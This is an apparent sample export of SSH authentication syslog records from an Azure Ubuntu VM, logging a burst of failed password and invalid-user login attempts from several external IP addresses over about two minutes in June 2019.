+9491,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:39:56,UbuntuDevEnv,2019-06-25 22:39:56,auth,UbuntuDevEnv,info,Invalid user mi from 77.232.128.87 port 54470,47983,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,mi,77.232.128.8,54470,,
+9492,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:39:56,UbuntuDevEnv,2019-06-25 22:39:56,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=77.232.128.87,47983,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,77.232.128.8,,0,
+9493,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:39:56,UbuntuDevEnv,2019-06-25 22:39:56,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,47983,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+9494,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:39:58,UbuntuDevEnv,2019-06-25 22:39:58,auth,UbuntuDevEnv,info,Failed password for invalid user mi from 77.232.128.87 port 54470 ssh2,47983,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,mi,77.232.128.8,54470,,
+9495,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:39:58,UbuntuDevEnv,2019-06-25 22:39:58,auth,UbuntuDevEnv,info,Received disconnect from 77.232.128.87 port 54470:11: Bye Bye [preauth],47983,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,77.232.128.8,54470,,
+9496,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:39:58,UbuntuDevEnv,2019-06-25 22:39:58,auth,UbuntuDevEnv,info,Disconnected from invalid user mi 77.232.128.87 port 54470 [preauth],47983,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,mi,77.232.128.8,54470,,
+9497,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:39:58,UbuntuDevEnv,2019-06-25 22:39:58,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.175 port 28012 ssh2,47967,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,28012,,
+9498,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:40:03,UbuntuDevEnv,2019-06-25 22:40:02,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.175 port 28012 ssh2,47967,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,28012,,
+9499,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:40:13,UbuntuDevEnv,2019-06-25 22:40:12,auth,UbuntuDevEnv,info,message repeated 3 times: [ Failed password for root from 218.92.0.175 port 28012 ssh2],47967,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,28012,,
+9500,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:40:16,UbuntuDevEnv,2019-06-25 22:40:15,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=218.92.0.175  user=root,47967,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,,0,
+9501,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:40:16,UbuntuDevEnv,2019-06-25 22:40:15,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.175 port 28012 ssh2,47967,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,28012,,
+9502,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:40:16,UbuntuDevEnv,2019-06-25 22:40:15,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 218.92.0.175 port 28012 ssh2 [preauth],47967,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,28012,,
+9503,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:40:16,UbuntuDevEnv,2019-06-25 22:40:15,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,47967,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+9504,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:40:16,UbuntuDevEnv,2019-06-25 22:40:15,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 218.92.0.175 port 28012: Too many authentication failures [preauth],47967,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,28012,,
+9505,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:40:19,UbuntuDevEnv,2019-06-25 22:40:18,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=218.92.0.175  user=root,48067,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,,0,
+9506,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:40:21,UbuntuDevEnv,2019-06-25 22:40:21,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.175 port 42550 ssh2,48067,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,42550,,
+9507,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:40:36,UbuntuDevEnv,2019-06-25 22:40:36,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 218.92.0.175 port 42550: Too many authentication failures [preauth],48067,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,42550,,
+9508,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:40:36,UbuntuDevEnv,2019-06-25 22:40:36,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 218.92.0.175 port 42550 ssh2 [preauth],48067,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,42550,,
+9509,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:40:36,UbuntuDevEnv,2019-06-25 22:40:36,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=218.92.0.175  user=root,48067,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,,0,
+9510,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:40:36,UbuntuDevEnv,2019-06-25 22:40:36,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,48067,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+9511,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:40:36,UbuntuDevEnv,2019-06-25 22:40:36,auth,UbuntuDevEnv,info,message repeated 5 times: [ Failed password for root from 218.92.0.175 port 42550 ssh2],48067,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,42550,,
+9512,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:40:40,UbuntuDevEnv,2019-06-25 22:40:39,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=218.92.0.175  user=root,48144,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,,0,
+9513,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:40:41,UbuntuDevEnv,2019-06-25 22:40:41,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.175 port 56899 ssh2,48144,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,56899,,
+9514,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:40:54,UbuntuDevEnv,2019-06-25 22:40:52,auth,UbuntuDevEnv,info,message repeated 4 times: [ Failed password for root from 218.92.0.175 port 56899 ssh2],48144,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,56899,,
+9515,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:40:54,UbuntuDevEnv,2019-06-25 22:40:53,auth,UbuntuDevEnv,info,Invalid user ftptest from 152.250.252.179 port 45604,48194,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ftptest,152.250.252.1,45604,,
+9516,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:40:54,UbuntuDevEnv,2019-06-25 22:40:53,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=152.250.252.179,48194,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,152.250.252.1,,0,
+9517,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:40:54,UbuntuDevEnv,2019-06-25 22:40:53,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,48194,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+9518,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:40:55,UbuntuDevEnv,2019-06-25 22:40:55,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=218.92.0.175  user=root,48144,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,,0,
+9519,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:40:55,UbuntuDevEnv,2019-06-25 22:40:55,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 218.92.0.175 port 56899 ssh2 [preauth],48144,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,56899,,
+9520,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:40:55,UbuntuDevEnv,2019-06-25 22:40:55,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,48144,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+9521,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:40:55,UbuntuDevEnv,2019-06-25 22:40:55,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 218.92.0.175 port 56899: Too many authentication failures [preauth],48144,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,56899,,
+9522,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:40:55,UbuntuDevEnv,2019-06-25 22:40:55,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.175 port 56899 ssh2,48144,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,56899,,
+9523,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:40:56,UbuntuDevEnv,2019-06-25 22:40:55,auth,UbuntuDevEnv,info,Failed password for invalid user ftptest from 152.250.252.179 port 45604 ssh2,48194,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ftptest,152.250.252.1,45604,,
+9524,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:40:56,UbuntuDevEnv,2019-06-25 22:40:56,auth,UbuntuDevEnv,info,Disconnected from invalid user ftptest 152.250.252.179 port 45604 [preauth],48194,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ftptest,152.250.252.1,45604,,
+9525,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:40:56,UbuntuDevEnv,2019-06-25 22:40:56,auth,UbuntuDevEnv,info,Received disconnect from 152.250.252.179 port 45604:11: Bye Bye [preauth],48194,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,152.250.252.1,45604,,
+9526,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:41:01,UbuntuDevEnv,2019-06-25 22:41:01,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=218.92.0.175  user=root,48213,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,,0,
+9527,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:41:04,UbuntuDevEnv,2019-06-25 22:41:03,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.175 port 6182 ssh2,48213,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,6182,,
+9528,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:41:07,UbuntuDevEnv,2019-06-25 22:41:06,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.175 port 6182 ssh2,48213,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,6182,,
+9529,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:41:07,UbuntuDevEnv,2019-06-25 22:41:07,auth,UbuntuDevEnv,info,Invalid user seeb from 139.199.113.140 port 54696,48242,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,seeb,139.199.113.1,54696,,
+9530,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:41:07,UbuntuDevEnv,2019-06-25 22:41:07,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,48242,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+9531,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:41:07,UbuntuDevEnv,2019-06-25 22:41:07,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=139.199.113.140,48242,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,139.199.113.1,,0,
+9532,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:41:08,UbuntuDevEnv,2019-06-25 22:41:07,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=178.62.54.79  user=root,48255,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,178.62.54.7,,0,
+9533,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:41:09,UbuntuDevEnv,2019-06-25 22:41:08,auth,UbuntuDevEnv,info,Invalid user l4d2 from 59.100.246.170 port 38093,48249,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,l4d2,59.100.246.1,38093,,
+9534,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:41:09,UbuntuDevEnv,2019-06-25 22:41:08,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=59.100.246.170,48249,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,59.100.246.1,,0,
+9535,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:41:09,UbuntuDevEnv,2019-06-25 22:41:08,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,48249,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+9536,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:41:10,UbuntuDevEnv,2019-06-25 22:41:09,auth,UbuntuDevEnv,info,Failed password for invalid user seeb from 139.199.113.140 port 54696 ssh2,48242,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,seeb,139.199.113.1,54696,,
+9537,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:41:10,UbuntuDevEnv,2019-06-25 22:41:09,auth,UbuntuDevEnv,info,Failed password for root from 178.62.54.79 port 38518 ssh2,48255,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,178.62.54.7,38518,,
+9538,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:41:10,UbuntuDevEnv,2019-06-25 22:41:09,auth,UbuntuDevEnv,info,Disconnected from authenticating user root 178.62.54.79 port 38518 [preauth],48255,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,root,178.62.54.7,38518,,
+9539,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:41:10,UbuntuDevEnv,2019-06-25 22:41:09,auth,UbuntuDevEnv,info,Received disconnect from 178.62.54.79 port 38518:11: Bye Bye [preauth],48255,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,178.62.54.7,38518,,
+9540,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:41:10,UbuntuDevEnv,2019-06-25 22:41:09,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.175 port 6182 ssh2,48213,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,6182,,
+9541,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:41:11,UbuntuDevEnv,2019-06-25 22:41:10,auth,UbuntuDevEnv,info,Disconnected from invalid user seeb 139.199.113.140 port 54696 [preauth],48242,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,seeb,139.199.113.1,54696,,
+9542,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:41:11,UbuntuDevEnv,2019-06-25 22:41:10,auth,UbuntuDevEnv,info,Received disconnect from 139.199.113.140 port 54696:11: Bye Bye [preauth],48242,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,139.199.113.1,54696,,
+9543,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:41:11,UbuntuDevEnv,2019-06-25 22:41:10,auth,UbuntuDevEnv,info,Failed password for invalid user l4d2 from 59.100.246.170 port 38093 ssh2,48249,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,l4d2,59.100.246.1,38093,,
+9544,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:41:11,UbuntuDevEnv,2019-06-25 22:41:10,auth,UbuntuDevEnv,info,Received disconnect from 59.100.246.170 port 38093:11: Bye Bye [preauth],48249,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,59.100.246.1,38093,,
+9545,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:41:11,UbuntuDevEnv,2019-06-25 22:41:10,auth,UbuntuDevEnv,info,Disconnected from invalid user l4d2 59.100.246.170 port 38093 [preauth],48249,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,l4d2,59.100.246.1,38093,,
+9546,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:41:13,UbuntuDevEnv,2019-06-25 22:41:12,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.175 port 6182 ssh2,48213,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,6182,,
+9547,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:41:16,UbuntuDevEnv,2019-06-25 22:41:15,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.175 port 6182 ssh2,48213,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,6182,,
+9548,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:41:18,UbuntuDevEnv,2019-06-25 22:41:18,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 218.92.0.175 port 6182 ssh2 [preauth],48213,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,6182,,
+9549,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:41:18,UbuntuDevEnv,2019-06-25 22:41:18,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.175 port 6182 ssh2,48213,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,6182,,
+9550,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:41:18,UbuntuDevEnv,2019-06-25 22:41:18,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,48213,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
